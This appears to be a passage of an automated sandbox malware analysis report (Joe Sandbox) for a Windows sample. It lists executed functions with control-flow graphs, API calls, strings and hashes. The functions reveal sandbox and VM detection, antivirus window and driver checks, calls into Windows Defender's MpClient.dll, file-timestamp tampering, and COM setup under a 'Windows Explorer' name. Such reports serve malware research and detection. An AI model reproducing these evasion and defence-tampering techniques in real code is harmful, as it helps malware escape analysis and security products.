CreateFileA 30070->30071 30072 401086 30071->30072 30073 401037 WriteFile 30071->30073 30072->30011 30074 40105a 30073->30074 30075 40104f SetEndOfFile 30073->30075 30074->30072 30076 40106a GetHandleInformation 30074->30076 30075->30074 30076->30072 30077 401079 30076->30077 30077->30072 30078 40107f CloseHandle 30077->30078 30078->30072 30080 401b92 GetFileTime 30079->30080 30081 401c25 MoveFileExA GetModuleHandleA 30079->30081 30082 401bb0 GetHandleInformation 30080->30082 30083 401bcc CreateFileA 30080->30083 30081->30012 30081->30013 30082->30083 30085 401bbf 30082->30085 30083->30081 30084 401beb SetFileTime 30083->30084 30084->30081 30086 401c09 GetHandleInformation 30084->30086 30085->30083 30087 401bc5 CloseHandle 30085->30087 30086->30081 30088 401c18 30086->30088 30087->30083 30088->30081 30089 401c1e CloseHandle 30088->30089 30089->30081 30091 401443 30090->30091 30092 40149f 30090->30092 30093 401455 GetHandleInformation 30091->30093 30094 40146d 30091->30094 30092->30015 30093->30094 30097 401460 30093->30097 30095 401491 30094->30095 30096 401479 GetHandleInformation 30094->30096 30095->30015 30096->30095 30098 401484 30096->30098 30097->30094 30099 401466 CloseHandle 30097->30099 30098->30095 30100 40148a CloseHandle 30098->30100 30099->30094 30100->30095 30101->30000 30102->30019

                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                            Function 00402C10 Relevance: 64.9, APIs: 28, Strings: 9, Instructions: 157librarywindowCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 0 402c10-402c42 LoadLibraryA GetModuleFileNameA call 403900 3 402c44-402c46 ExitProcess 0->3 4 402c4c-402c67 call 4020b0 call 401fc0 FindWindowA 0->4 9 402c81-402c9f call 402240 call 402330 call 402420 call 402560 IsUserAnAdmin 4->9 10 402c69-402c7b GetTickCount PostMessageA 4->10 19 402ca1-402ca8 call 401d80 9->19 20 402cc3-402cdb IsUserAnAdmin GetModuleHandleA 9->20 10->9 28 402cb2-402cb9 call 403440 19->28 29 402caa-402cac ExitProcess 19->29 22 402cfc-402d00 20->22 23 402cdd-402ced GetProcAddress 20->23 26 402d02-402d04 22->26 27 402d4e-402d50 22->27 23->22 25 402cef-402cf9 GetCurrentProcess 23->25 25->22 32 402d06-402d1a StrStrIA 26->32 33 402d1c-402d3a call 402810 GetCurrentProcessId call 401580 Sleep 26->33 30 402d56-402d6a StrStrIA 27->30 31 402ddd-402df6 call 402810 GlobalFindAtomA 27->31 28->20 51 402cbb-402cbd ExitProcess 28->51 37 402d81-402d94 call 402950 GlobalFindAtomA 30->37 38 402d6c-402d7c call 402810 call 4027b0 30->38 48 402e38-402e3a ExitProcess 31->48 49 402df8-402e07 GlobalAddAtomA IsUserAnAdmin 31->49 32->33 39 402d3f-402d44 call 402950 call 4011c0 32->39 33->48 54 402dd6-402ddb call 4011c0 37->54 55 402d96-402da5 GlobalAddAtomA IsUserAnAdmin 37->55 38->48 64 402d49 39->64 56 402e19-402e22 IsUserAnAdmin 49->56 57 402e09-402e11 49->57 54->48 60 402db7-402dc0 IsUserAnAdmin 55->60 61 402da7-402daf 55->61 62 402e24 56->62 63 402e29-402e31 call 4014b0 56->63 57->56 67 402dc2 60->67 68 402dc7-402dcf call 4014b0 60->68 61->60 62->63 63->48 74 402e33 call 401580 63->74 64->48 67->68 68->54 75 402dd1 call 401580 68->75 74->48 75->54
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(user32.dll), ref: 00402C21
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00402C35
                                                                                                                                                                                                              • Part of subcall function 00403900: RegOpenKeyExA.KERNELBASE(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403940
                                                                                                                                                                                                              • Part of subcall function 00403900: RegQueryValueExA.KERNELBASE(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403965
                                                                                                                                                                                                              • Part of subcall function 00403900: RegCloseKey.ADVAPI32(?), ref: 00403973
                                                                                                                                                                                                              • Part of subcall function 00403900: GetUserNameA.ADVAPI32(?,00000104), ref: 004039B9
                                                                                                                                                                                                              • Part of subcall function 00403900: CharUpperA.USER32(?), ref: 004039C6
                                                                                                                                                                                                              • Part of subcall function 00403900: strstr.MSVCRT ref: 004039DE
                                                                                                                                                                                                              • Part of subcall function 00403900: strstr.MSVCRT ref: 004039F7
                                                                                                                                                                                                              • Part of subcall function 00403900: strstr.MSVCRT ref: 00403A10
                                                                                                                                                                                                              • Part of subcall function 00403900: GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403A29
                                                                                                                                                                                                              • Part of subcall function 00403900: GetVolumeInformationA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403A4D
                                                                                                                                                                                                              • Part of subcall function 00403900: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403A87
                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00402C46
                                                                                                                                                                                                            • FindWindowA.USER32(____AVP.Root,00000000), ref: 00402C5D
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00402C69
                                                                                                                                                                                                            • PostMessageA.USER32(00000000,00000466,00010001,00000000), ref: 00402C7B
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 00402C9B
                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00402CAC
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Namestrstr$ExitFileModuleProcessUser$AdminCharCloseCountDirectoryFindInformationLibraryLoadMessageOpenPostQuerySystemTickUpperValueVolumeWindowWindows
                                                                                                                                                                                                            • String ID: Fri Jun 17 05:52:09 20112$IsWow64Process$PnEw$\apppatch\$____AVP.Root$explorer.exe$kernel32.dll$user32.dll$winlogon.exe
                                                                                                                                                                                                            • API String ID: 3353599405-3887202299
                                                                                                                                                                                                            • Opcode ID: bc37064e32afb366b102f5e82575ccf3b4a8d8f59925a4562639c9f879143649
                                                                                                                                                                                                            • Instruction ID: a8c301d2fd554ff8a4c2a18cdd62ad6e0f77d76d1eb59a281ca00d7aee5c603c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: bc37064e32afb366b102f5e82575ccf3b4a8d8f59925a4562639c9f879143649
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FC515EB1640201A7EB1077B1EF0EB5B3668AF94B45F10413ABB05B61E1EBFC8D4586AD
                                                                                                                                                                                                            Function 00403900 Relevance: 47.4, APIs: 15, Strings: 12, Instructions: 134registrystringCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 129 403900-403948 RegOpenKeyExA 130 40394a-40396d RegQueryValueExA 129->130 131 4039ad-4039e5 GetUserNameA CharUpperA strstr 129->131 134 40397b-40398c RegCloseKey 130->134 135 40396f-403979 RegCloseKey 130->135 132 403acb 131->132 133 4039eb-4039fe strstr 131->133 137 403acc-403ad2 132->137 133->132 136 403a04-403a17 strstr 133->136 134->131 138 40398e-403995 134->138 135->131 136->132 140 403a1d-403a5b GetSystemWindowsDirectoryA GetVolumeInformationA 136->140 138->131 139 403997-40399e 138->139 139->131 141 4039a0-4039a7 139->141 140->132 142 403a5d-403a62 140->142 141->131 141->137 142->132 143 403a64-403a69 142->143 143->132 144 403a6b-403a70 143->144 144->132 145 403a72-403a77 144->145 145->132 146 403a79-403aa3 GetModuleFileNameA StrStrIA 145->146 146->132 147 403aa5-403ab5 StrStrIA 146->147 147->132 148 403ab7-403ac7 StrStrIA 147->148 148->132 149 403ac9 148->149 149->132
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RegOpenKeyExA.KERNELBASE(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403940
                                                                                                                                                                                                            • RegQueryValueExA.KERNELBASE(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403965
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00403973
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0040397F
                                                                                                                                                                                                            • GetUserNameA.ADVAPI32(?,00000104), ref: 004039B9
                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 004039C6
                                                                                                                                                                                                            • strstr.MSVCRT ref: 004039DE
                                                                                                                                                                                                            • strstr.MSVCRT ref: 004039F7
                                                                                                                                                                                                            • strstr.MSVCRT ref: 00403A10
                                                                                                                                                                                                            • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403A29
                                                                                                                                                                                                            • GetVolumeInformationA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403A4D
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403A87
                                                                                                                                                                                                            • StrStrIA.KERNELBASE(?,\sand-box\), ref: 00403A9F
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\cwsandbox\), ref: 00403AB1
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\sandbox\), ref: 00403AC3
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: strstr$CloseName$CharDirectoryFileInformationModuleOpenQuerySystemUpperUserValueVolumeWindows
                                                                                                                                                                                                            • String ID: E$HARDWARE\DESCRIPTION\System$M$MALNETVM$Q$SANDBOX$SystemBiosVersion$U$VIRUSCLONE$\cwsandbox\$\sand-box\$\sandbox\
                                                                                                                                                                                                            • API String ID: 1431998568-3499098167
                                                                                                                                                                                                            • Opcode ID: 3b908be20d57cd3dc64100d28935cd3b8a2d2fe8bb1a9ff6224eef881bebb134
                                                                                                                                                                                                            • Instruction ID: c92bd0b18e501642bc8da1a15e04f066bbee5c1b1fab61bbe3854025ca4dfe5f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3b908be20d57cd3dc64100d28935cd3b8a2d2fe8bb1a9ff6224eef881bebb134
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8741D8B1A50218A7DB20DB90CD4AFEF7B7C9B94705F1440AAE744B51C0D7B99B84CFA8
                                                                                                                                                                                                            Function 004020B0 Relevance: 36.8, APIs: 3, Strings: 18, Instructions: 81fileCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 150 4020b0-4021fe CreateFileA 151 402230-402235 150->151 152 402200-40222a DeviceIoControl CloseHandle 150->152 152->151
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNELBASE(\\.\KmxAgent,00000000,00000000,00000000,00000003,00000080,00000000), ref: 004021F3
                                                                                                                                                                                                            • DeviceIoControl.KERNEL32(00000000,86000054,000000B4,000000B4,?,00000004,?,00000000), ref: 00402223
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040222A
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                                                                            • String ID: "$"$0$4$D$E$E$S$T$\\.\KmxAgent$d$e$g$m$m$s$t$t
                                                                                                                                                                                                            • API String ID: 33631002-3172865025
                                                                                                                                                                                                            • Opcode ID: 9681e669b6bc70e9123dd5980162aec26310b354dbad36ed1e8ea522fa3927e4
                                                                                                                                                                                                            • Instruction ID: e7d083a3d342eb0d1741576d2c48f75b21a67eac2e30cb69abab2c03069a185e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9681e669b6bc70e9123dd5980162aec26310b354dbad36ed1e8ea522fa3927e4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 384184B0D01358DEEB20CF959988BDEFEB5BB04308F5081AED5186B281C7B90A89CF55
                                                                                                                                                                                                            Function 00401A30 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 103memoryfilelibraryCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 153 401a30-401a45 154 401b53-401b59 153->154 155 401a4b-401a58 call 4010a0 153->155 155->154 158 401a5e-401a69 RtlImageNtHeader 155->158 159 401b31-401b45 GetProcessHeap HeapValidate 158->159 160 401a6f-401a90 GetTickCount GetModuleHandleA 158->160 159->154 161 401b47-401b4d GetProcessHeap HeapFree 159->161 162 401a92-401aa0 GetProcAddress 160->162 163 401aa9-401ac4 160->163 161->154 162->163 164 401aa2 162->164 163->159 165 401ac6-401ae7 CreateFileA 163->165 164->163 165->159 166 401ae9-401b01 WriteFile 165->166 167 401b03-401b04 SetEndOfFile 166->167 168 401b0a-401b13 166->168 167->168 168->159 169 401b15-401b22 GetHandleInformation 168->169 169->159 170 401b24-401b28 169->170 170->159 171 401b2a-401b2b CloseHandle 170->171 171->159
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 004010A0: CreateFileA.KERNELBASE('+@,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,?,00401A54,00000000,00000000,?,00000000), ref: 004010C6
                                                                                                                                                                                                              • Part of subcall function 004010A0: GetFileSizeEx.KERNEL32(00000000,00401A54,?,00401A54,00000000,00000000,?,00000000,00402B27), ref: 004010E7
                                                                                                                                                                                                              • Part of subcall function 004010A0: GetProcessHeap.KERNEL32(00000008,00401A67,?,00401A54,00000000,00000000,?,00000000,00402B27), ref: 004010FD
                                                                                                                                                                                                              • Part of subcall function 004010A0: RtlAllocateHeap.NTDLL(00000000,?,00401A54,00000000,00000000,?,00000000,00402B27), ref: 00401104
                                                                                                                                                                                                              • Part of subcall function 004010A0: memset.MSVCRT ref: 00401114
                                                                                                                                                                                                              • Part of subcall function 004010A0: ReadFile.KERNELBASE(?,00000000,00401A54,00000000,00000000,?,?,?,?,00401A54), ref: 00401133
                                                                                                                                                                                                              • Part of subcall function 004010A0: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00401A54), ref: 00401145
                                                                                                                                                                                                              • Part of subcall function 004010A0: HeapValidate.KERNEL32(00000000,?,?,?,?,00401A54), ref: 00401148
                                                                                                                                                                                                              • Part of subcall function 004010A0: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00401A54), ref: 00401155
                                                                                                                                                                                                              • Part of subcall function 004010A0: HeapFree.KERNEL32(00000000,?,?,?,?,00401A54), ref: 00401158
                                                                                                                                                                                                              • Part of subcall function 004010A0: GetHandleInformation.KERNEL32(00000000,00000000,?,00401A54,00000000,00000000), ref: 00401173
                                                                                                                                                                                                              • Part of subcall function 004010A0: CloseHandle.KERNELBASE(00000000,?,00401A54,00000000,00000000), ref: 00401184
                                                                                                                                                                                                              • Part of subcall function 004010A0: IsBadWritePtr.KERNEL32(?,00000004), ref: 00401194
                                                                                                                                                                                                            • RtlImageNtHeader.NTDLL(00000000), ref: 00401A5F
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00401A77
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 00401A88
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401A98
                                                                                                                                                                                                            • CreateFileA.KERNELBASE(?,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 00401ADC
                                                                                                                                                                                                            • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00401AF9
                                                                                                                                                                                                            • SetEndOfFile.KERNELBASE(00000000), ref: 00401B04
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401B1A
                                                                                                                                                                                                            • CloseHandle.KERNELBASE(00000000), ref: 00401B2B
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401B3A
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 00401B3D
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401B4A
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00401B4D
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$File$HandleProcess$CloseCreateFreeInformationValidateWrite$AddressAllocateCountHeaderImageModuleProcReadSizeTickmemset
                                                                                                                                                                                                            • String ID: '+@$RtlUniform$ntdll.dll
                                                                                                                                                                                                            • API String ID: 444222748-2605303930
                                                                                                                                                                                                            • Opcode ID: a684177415ef1389c265edc60bbb787380eb140592000129f1f3a54920f38112
                                                                                                                                                                                                            • Instruction ID: 5333274c7b5ae32bd68dbaed39568bfcb3f6f97b50696231050ce748e7cb221e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a684177415ef1389c265edc60bbb787380eb140592000129f1f3a54920f38112
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 083181B1601304ABE710AB75DD49F5B3AACAB84755F458136FF05F72E0EB78D9008AA8
                                                                                                                                                                                                            Function 004010A0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111memoryfileCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 179 4010a0-4010af 180 4010b5-4010d4 CreateFileA 179->180 181 40118a-40118f 179->181 180->181 184 4010da-4010f2 GetFileSizeEx 180->184 182 401191-40119e IsBadWritePtr 181->182 183 4011ab 181->183 185 4011a0-4011a8 182->185 186 4011ad-4011b3 182->186 183->186 187 401163-40116c 184->187 188 4010f4-40110e GetProcessHeap RtlAllocateHeap 184->188 187->181 191 40116e-40117b GetHandleInformation 187->191 189 401160 188->189 190 401110-40111e memset 188->190 189->187 190->189 192 401120-40113b ReadFile 190->192 191->181 193 40117d-401181 191->193 192->189 194 40113d-401150 GetProcessHeap HeapValidate 192->194 193->181 195 401183-401184 CloseHandle 193->195 196 401152-401158 GetProcessHeap HeapFree 194->196 197 40115e 194->197 195->181 196->197 197->189
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNELBASE('+@,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,?,00401A54,00000000,00000000,?,00000000), ref: 004010C6
                                                                                                                                                                                                            • GetFileSizeEx.KERNEL32(00000000,00401A54,?,00401A54,00000000,00000000,?,00000000,00402B27), ref: 004010E7
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00401A67,?,00401A54,00000000,00000000,?,00000000,00402B27), ref: 004010FD
                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,00401A54,00000000,00000000,?,00000000,00402B27), ref: 00401104
                                                                                                                                                                                                            • memset.MSVCRT ref: 00401114
                                                                                                                                                                                                            • ReadFile.KERNELBASE(?,00000000,00401A54,00000000,00000000,?,?,?,?,00401A54), ref: 00401133
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00401A54), ref: 00401145
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,?,?,00401A54), ref: 00401148
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00401A54), ref: 00401155
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,00401A54), ref: 00401158
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000,?,00401A54,00000000,00000000), ref: 00401173
                                                                                                                                                                                                            • CloseHandle.KERNELBASE(00000000,?,00401A54,00000000,00000000), ref: 00401184
                                                                                                                                                                                                            • IsBadWritePtr.KERNEL32(?,00000004), ref: 00401194
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$FileProcess$Handle$AllocateCloseCreateFreeInformationReadSizeValidateWritememset
                                                                                                                                                                                                            • String ID: '+@
                                                                                                                                                                                                            • API String ID: 995291462-3270456718
                                                                                                                                                                                                            • Opcode ID: 8acb88134f09bb4553fa1f20c980ac2f479e22f48b63d87f01b3e3b6e2272333
                                                                                                                                                                                                            • Instruction ID: 9704cbedb43cf1f0123ea2a6f6cc4f04c30b9336f8140f0f9319c9250b15b478
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8acb88134f09bb4553fa1f20c980ac2f479e22f48b63d87f01b3e3b6e2272333
                                                                                                                                                                                                            • Instruction Fuzzy Hash: EF3176B2A01214ABD7109BA59D48F6B7B6CEB88B51F144236FF04F7290D7349D0186A8
                                                                                                                                                                                                            Function 00401FC0 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 68libraryloaderCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 210 401fc0-40201c memset SHGetFolderPathA 211 402087-402089 210->211 212 40201e-40203f PathAppendA SetCurrentDirectoryA 210->212 213 402092-4020a2 211->213 214 40208b-40208c FreeLibrary 211->214 212->211 215 402041-402053 LoadLibraryA 212->215 214->213 215->211 216 402055-402063 GetProcAddress 215->216 216->211 217 402065-402072 216->217 217->211
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 00401FFE
                                                                                                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402014
                                                                                                                                                                                                            • PathAppendA.SHLWAPI(?,Windows Defender), ref: 0040202A
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNELBASE(?), ref: 00402037
                                                                                                                                                                                                            • LoadLibraryA.KERNELBASE(MpClient.dll), ref: 00402046
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,WDEnable), ref: 0040205B
                                                                                                                                                                                                            • FreeLibrary.KERNELBASE(00000000), ref: 0040208C
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: LibraryPath$AddressAppendCurrentDirectoryFolderFreeLoadProcmemset
                                                                                                                                                                                                            • String ID: MpClient.dll$V,@$WDEnable$Windows Defender
                                                                                                                                                                                                            • API String ID: 1010965793-4204822615
                                                                                                                                                                                                            • Opcode ID: 3df85f3b417d1b5c3b465db41dcca31682b6cff8283aa0f7457e6563496e2944
                                                                                                                                                                                                            • Instruction ID: d5d199d1064221ab56ad58356cdb5c20067bd4798bc980eb12739ab0272296c4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3df85f3b417d1b5c3b465db41dcca31682b6cff8283aa0f7457e6563496e2944
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E711A8B1900355ABC7219F649D49FABBB7CFB48751F10067AFB55B21D0D6784E008AA8
                                                                                                                                                                                                            Function 00402560 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 228commemoryCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 219 402560-40258c CoInitializeEx 220 40258e-402591 219->220 221 40259f-4025c7 GetModuleFileNameW SysAllocString 219->221 220->221 222 402593-402599 220->222 223 402749-40274f 221->223 224 4025cd-4025d8 SysAllocString 221->224 222->221 225 4027a4-4027a9 222->225 226 402751-402756 223->226 227 402759-40275e 223->227 228 402733-402741 SysFreeString 224->228 229 4025de-4025ff CoCreateInstance 224->229 226->227 230 402760-402765 227->230 231 402768-40276d 227->231 234 402743-402744 SysFreeString 228->234 235 402746 228->235 232 402605-40260a 229->232 233 402707-40270a 229->233 230->231 237 402777-40277c 231->237 238 40276f-402774 231->238 232->233 236 402610-402621 232->236 233->228 234->235 235->223 236->228 244 402627-402638 236->244 239 402786-40278b 237->239 240 40277e-402783 237->240 238->237 242 402795-402797 239->242 243 40278d-402792 239->243 240->239 245 402799-40279c 242->245 246 40279e CoUninitialize 242->246 243->242 244->228 248 40263e-402648 244->248 245->225 245->246 246->225 249 40264d-40264f 248->249 249->228 250 402655-40265c 249->250 251 402731 250->251 252 402662-402673 250->252 251->228 252->251 254 402679-402691 252->254 256 402693-4026b3 CoCreateInstance 254->256 257 40270c-40271d 254->257 258 4026b5-4026ba 256->258 259 4026bc 256->259 257->251 263 40271f-402723 257->263 258->259 260 4026be-4026c3 258->260 259->260 260->251 262 4026c5-4026d0 260->262 262->251 266 4026d2-4026e3 262->266 263->251 264 402725-40272e 263->264 264->251 266->251 268 4026e5-4026f4 266->268 268->251 270 4026f6-402705 268->270 270->251
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040257F
                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000), ref: 004025AD
                                                                                                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 004025C0
                                                                                                                                                                                                            • SysAllocString.OLEAUT32(Windows Explorer), ref: 004025D2
                                                                                                                                                                                                            • CoCreateInstance.OLE32(00404E10,00000000,00004401,00404E20,?), ref: 004025FB
                                                                                                                                                                                                            • CoCreateInstance.OLE32(00404E30,00000000,00004401,00404E40,?), ref: 004026AF
                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00402C95), ref: 0040273D
                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 00402744
                                                                                                                                                                                                            • CoUninitialize.COMBASE ref: 0040279E
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: String$AllocCreateFreeInstance$FileInitializeModuleNameUninitialize
                                                                                                                                                                                                            • String ID: Windows Explorer
                                                                                                                                                                                                            • API String ID: 1140695583-228612681
                                                                                                                                                                                                            • Opcode ID: f4cedc7bac158036922e6c1ea2cc3172f771719353f965fc279a44cca6b87cc4
